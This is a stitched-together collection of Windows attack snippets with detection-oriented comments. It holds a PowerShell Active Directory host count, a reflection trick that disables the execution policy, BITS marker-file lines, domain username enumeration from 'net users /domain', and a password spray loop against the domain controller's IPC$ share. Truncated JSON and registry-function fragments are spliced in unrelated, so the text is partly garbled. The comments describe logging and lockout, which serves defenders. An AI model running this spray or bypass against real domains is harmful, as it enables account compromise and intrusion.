rem Counts computer objects in the local machine's AD domain: builds an LDAP DN from the
rem WMI Win32_ComputerSystem domain name, runs a DirectorySearcher for
rem (objectCategory=computer) and prints the result count.
rem   -1 = this host is not domain-joined;  -2 = the LDAP query threw (no DC reachable,
rem   access denied, etc.) and was swallowed by the catch.
rem "-ep bypass" only relaxes the execution policy for this one process; the command text
rem is still recorded by process-creation auditing with command line (4688) and, once the
rem script runs, by PowerShell Script Block Logging (4104).
powershell -ep bypass -command "$s=gwmi Win32_ComputerSystem; if (-not $s.PartOfDomain) { $n=-1 } else { $dr='LDAP://';$s.Domain.Split('.') | % { $dr+='DC='+$_+',' }; $dr=$dr.TrimEnd(','); try { $ad=New-Object DirectoryServices.DirectorySearcher(([adsi]$dr),'(objectCategory=computer)',('name')); $n=($ad.FindAll()).Count } catch { $n=-2} };write-host " Hosts count: " $n; "
# from https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/
#
# Replaces the running session's private AuthorizationManager (reached by reflection through
# the non-public "_context" and "_authorizationManager" fields of ExecutionContext) with a
# freshly constructed base-class AuthorizationManager, whose default ShouldRun check permits
# everything, in place of the policy-aware PSAuthorizationManager. Scope is this process and
# this runspace only: no registry value or Group Policy setting is touched, and a new
# powershell.exe starts with the configured policy intact. Execution policy is not a security
# boundary; the thing worth watching for is the reflection call chain itself, which Script
# Block Logging (event 4104) records verbatim when it is enabled.
function Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))}
Disable-ExecutionPolicy
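rem Marker file written by the BITS job's command so its execution can be verified on the desktop.
rem %HOMEPATH% carries no drive letter (\Users\name), so the path is resolved against whatever
rem the current drive happens to be and can land on the wrong volume; %USERPROFILE% is the fully
rem qualified home directory. The message (quotes included, as cmd's echo emits them) is unchanged.
echo "Bits Job Executed" > "%USERPROFILE%\Desktop\bitsjob.txt"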
# Appends a one-line marker to the user's desktop so the BITS job's execution can be confirmed.
Add-Content -Path "$env:USERPROFILE\desktop\bitsjob.txt" -Value 'Bits job executed'
{ | |
"name": "AzureCloudBrainStorming", | |
"version": "3.0", | |
"domain": "mitre-enterprise", | |
"description": "", | |
"filters": { | |
"stages": [ | |
"act" | |
], | |
"platforms": [ |
function setKey($registryPath, $Name, $Value, $Type="DWORD") { | |
IF(!(Test-Path $registryPath)) | |
{ | |
New-Item -Path $registryPath -Force | Out-Null | |
New-ItemProperty -Path $registryPath -Name $Name -Value $value -PropertyType $Type -Force | Out-Null | |
} |
rem Create the users.txt by parsing the "net users /domain" output
rem Single-percent FOR variables: this form is pasted at an interactive cmd.exe prompt, not saved
rem as a .bat (a batch file needs %%a). Scratch files live in %temp%; the first line clears leftovers
rem from an earlier run so the >> appends below start from empty files.
del %temp%\1.txt >nul 2>&1 & del %temp%\2.txt >nul 2>&1 & del %temp%\3.txt >nul 2>&1 & del %temp%\users.txt >nul 2>&1
rem Pass 1: skip the 6-line header of "net users /domain", drop the "The command completed..."
rem trailer, and turn every space into a comma. The caret in %^line...% survives the first parse
rem so that "call" expands the substitution at run time (plain %line% would expand to the old value).
@FOR /F "skip=6 delims=" %a in ('net users /domain ^| findstr /vc:"The command c"') do @set line=%a & @call echo %^line: =,% >> %temp%\1.txt
rem Pass 2: normalise ", " to "," so each row is a plain comma-separated list.
@FOR /F "delims=" %a in (%temp%\1.txt) do @set line=%a & @call echo %^line:, =,% >> %temp%\2.txt
rem Pass 3: emit the first three comma-separated tokens of each row on lines of their own.
@FOR /F "tokens=1-3 delims=," %n in (%temp%\2.txt) do @echo %n >> %temp%\3.txt & @echo %o >> %temp%\3.txt & @echo %p >> %temp%\3.txt
rem Pass 4: an empty token makes "echo" print "ECHO is on."; filter those lines out, the rest are usernames.
@FOR /F "tokens=*" %a in ('type %temp%\3.txt ^| findstr /vc:"ECHO is on."') do @echo %a >> %temp%\users.txt
rem Reset the command window title so you can see the progress of the password spray in the title
title Command Prompt
rem Set your password for the spray here
rem One password tried against every enumerated account is exactly the shape domain lockout
rem thresholds and DC logon auditing (a burst of failed logons across many accounts from a single
rem source in a short window) are tuned to catch. The spray loop itself is not part of this snippet.
set password=Spring2020
rem Builds %temp%\users.txt from "net users /domain" in four passes. Single-percent FOR variables
rem mean this is typed or pasted at an interactive cmd.exe prompt (a .bat would need %%a).
rem Clear scratch files from a previous run so the >> appends start empty.
del %temp%\1.txt >nul 2>&1 & del %temp%\2.txt >nul 2>&1 & del %temp%\3.txt >nul 2>&1 & del %temp%\users.txt >nul 2>&1
rem Skip the 6-line header, drop the "The command completed..." trailer, spaces -> commas
rem (the caret plus "call" makes the %line:...% substitution expand at run time).
@FOR /F "skip=6 delims=" %a in ('net users /domain ^| findstr /vc:"The command c"') do @set line=%a & @call echo %^line: =,% >> %temp%\1.txt
rem ", " -> "," so each row is a plain comma-separated list.
@FOR /F "delims=" %a in (%temp%\1.txt) do @set line=%a & @call echo %^line:, =,% >> %temp%\2.txt
rem First three comma-separated tokens of each row, one per line.
@FOR /F "tokens=1-3 delims=," %n in (%temp%\2.txt) do @echo %n >> %temp%\3.txt & @echo %o >> %temp%\3.txt & @echo %p >> %temp%\3.txt
rem Drop the "ECHO is on." lines that empty tokens produce; what remains are usernames.
@FOR /F "tokens=*" %a in ('type %temp%\3.txt ^| findstr /vc:"ECHO is on."') do @echo %a >> %temp%\users.txt
rem Batch-file (.bat) form of the users.txt builder: FOR variables are doubled (%%a) and the
rem environment changes are confined to this script by SETLOCAL.
rem EnableDelayedExpansion is switched on, but nothing below uses !line!; the substitutions still
rem rely on the "call echo %%line...%%" trick, so the option is not actually needed here, and with
rem it on any "!" character in the net.exe output would be consumed during expansion.
SETLOCAL EnableDelayedExpansion
rem Clear scratch files from a previous run so the >> appends start empty.
del %temp%\1.txt >nul 2>&1 & del %temp%\2.txt >nul 2>&1 & del %temp%\3.txt >nul 2>&1 & del %temp%\users.txt >nul 2>&1
rem Skip the 6-line header of "net users /domain", drop the "The command completed..." trailer,
rem spaces -> commas ("call" forces the %line:...% substitution to expand at run time).
@FOR /F "skip=6 delims=" %%a in ('net users /domain ^| findstr /vc:"The command c"') do @set line=%%a & @call echo %%line: =,%% >> %temp%\1.txt
rem ", " -> "," so each row is a plain comma-separated list.
@FOR /F "delims=" %%a in (%temp%\1.txt) do @set line=%%a & @call echo %%line:, =,%% >> %temp%\2.txt
rem First three comma-separated tokens of each row, one per line.
@FOR /F "tokens=1-3 delims=," %%n in (%temp%\2.txt) do @echo %%n >> %temp%\3.txt & @echo %%o >> %temp%\3.txt & @echo %%p >> %temp%\3.txt
rem Drop the "ECHO is on." lines that empty tokens produce; what remains are usernames.
@FOR /F "tokens=*" %%a in ('type %temp%\3.txt ^| findstr /vc:"ECHO is on."') do @echo %%a >> %temp%\users.txt
rem Outer loop walks pass.txt, inner loop walks users.txt; for every pair one "net use" is made to
rem the domain controller's IPC$ share (%logonserver% already carries the \\ prefix). A successful
rem mapping prints "[*] user:password" and is immediately deleted; failures are discarded by
rem 1>NUL 2>&1. Single-percent FOR variables: interactive cmd.exe prompt, not a .bat file.
rem Every iteration is a full SMB session setup against the DC, so each attempt leaves an
rem authentication event there (4776 for NTLM, 4768/4771 for Kerberos, plus 4625 on failure).
rem The pattern to alert on is many distinct accounts from one source host in a short window;
rem account lockout thresholds bound how far down pass.txt this can get.
@FOR /F "delims=" %p in (pass.txt) DO @FOR /F "delims=" %n in (users.txt) DO @net use %logonserver%\IPC$ /user:"%userdomain%\%n" "%p" 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete %logonserver%\IPC$ > NUL